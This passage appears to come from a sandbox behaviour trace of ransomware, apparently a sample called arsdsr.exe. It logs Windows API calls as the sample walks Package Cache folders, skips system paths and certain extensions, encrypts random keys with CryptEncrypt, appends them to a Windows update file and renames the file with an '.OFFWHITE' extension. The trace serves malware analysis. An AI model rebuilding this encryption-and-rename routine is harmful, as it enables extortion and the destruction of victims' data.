ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.045] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.046] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.046] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName="x64", cAlternateFileName="")) returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2=".") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="..") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="...") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="windows") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="$recycle.bin") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="rsa") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="ntuser.dat") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="programdata") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="appdata") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="program files") returned 1 [0148.046] lstrcmpiW (lpString1="x64", lpString2="program files (x86)") returned 1 [0148.046] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\" [0148.046] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\", lpString2="x64" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0148.046] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\" [0148.046] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\" [0148.046] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*" [0148.046] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0148.046] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.046] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0148.046] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.047] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.047] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab54b00, ftCreationTime.dwHighDateTime=0x1d1a02d, ftLastAccessTime.dwLowDateTime=0x9ab54b00, ftLastAccessTime.dwHighDateTime=0x1d1a02d, ftLastWriteTime.dwLowDateTime=0x9ab54b00, ftLastWriteTime.dwHighDateTime=0x1d1a02d, nFileSizeHigh=0x0, nFileSizeLow=0xfc93c, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="..") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="...") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="windows") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="$recycle.bin") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="rsa") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="ntuser.dat") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="programdata") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="appdata") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="program files") returned 1 [0148.047] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="program files (x86)") returned 1 [0148.047] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\" [0148.047] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\", lpString2="Windows6.1-KB2999226-x64.msu" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" [0148.047] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.047] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.047] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x64.msu") returned=".msu" [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".exe") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".log") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".cab") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".cmd") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".com") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".cpl") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".ini") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".url") returned -1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".ttf") returned -1 [0148.047] lstrcmpiW (lpString1=".msu", lpString2=".mp3") returned 1 [0148.048] lstrcmpiW (lpString1=".msu", lpString2=".pif") returned -1 [0148.048] lstrcmpiW (lpString1=".msu", lpString2=".mp4") returned 1 [0148.048] lstrcmpiW (lpString1=".msu", lpString2=".OFFWHITE") returned -1 [0148.048] lstrcmpiW (lpString1=".msu", lpString2=".msi") returned 1 [0148.048] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0148.048] GetProcessHeap () returned 0x500000 [0148.048] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d68 [0148.048] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0148.078] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=1034556) returned 1 [0148.079] GetProcessHeap () returned 0x500000 [0148.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0148.079] GetProcessHeap () returned 0x500000 [0148.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0148.079] GetProcessHeap () returned 0x500000 [0148.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0148.079] GetProcessHeap () returned 0x500000 [0148.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0148.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.079] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0148.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.079] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0148.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.079] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295c910*=0x100) returned 1 [0148.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.080] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295c90c*=0x100) returned 1 [0148.080] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xfc93c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.080] SetLastError (dwErrCode=0x0) [0148.080] WriteFile (in: hFile=0x1e4, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0148.119] GetLastError () returned 0x0 [0148.119] GetLastError () returned 0x0 [0148.119] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xfca3c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.119] WriteFile (in: hFile=0x1e4, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0148.119] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xfcb3c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.119] WriteFile (in: hFile=0x1e4, lpBuffer=0x526d68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x526d68*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0148.119] GetProcessHeap () returned 0x500000 [0148.119] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xfc93c) returned 0x2a60020 [0148.120] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.120] ReadFile (in: hFile=0x1e4, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xfc93c, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295cb40*=0xfc93c, lpOverlapped=0x0) returned 1 [0148.382] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.382] WriteFile (in: hFile=0x1e4, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xfc93c, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295cb4c*=0xfc93c, lpOverlapped=0x0) returned 1 [0148.386] GetProcessHeap () returned 0x500000 [0148.386] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0148.392] CloseHandle (hObject=0x1e4) returned 1 [0148.392] GetProcessHeap () returned 0x500000 [0148.393] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0148.393] GetProcessHeap () returned 0x500000 [0148.393] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0148.393] GetProcessHeap () returned 0x500000 [0148.393] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0148.393] GetProcessHeap () returned 0x500000 [0148.393] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0148.393] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" [0148.393] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.OFFWHITE" [0148.393] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.offwhite")) returned 1 [0148.394] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab54b00, ftCreationTime.dwHighDateTime=0x1d1a02d, ftLastAccessTime.dwLowDateTime=0x9ab54b00, ftLastAccessTime.dwHighDateTime=0x1d1a02d, ftLastWriteTime.dwLowDateTime=0x9ab54b00, ftLastWriteTime.dwHighDateTime=0x1d1a02d, nFileSizeHigh=0x0, nFileSizeLow=0xfc93c, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0148.394] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0148.394] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName="x64", cAlternateFileName="")) returned 0 [0148.394] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.394] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName="Patch", cAlternateFileName="")) returned 0 [0148.394] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.394] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.394] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.395] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2=".") returned 1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="..") returned 1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="...") returned 1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="windows") returned -1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="$recycle.bin") returned 1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="rsa") returned -1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="ntuser.dat") returned -1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="programdata") returned -1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="appdata") returned -1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="program files") returned -1 [0148.395] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="program files (x86)") returned -1 [0148.395] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.395] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0148.395] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\" [0148.395] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\" [0148.395] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*" [0148.395] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.396] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.396] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.396] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.396] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.396] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.396] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.396] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.396] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\" [0148.396] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0148.396] 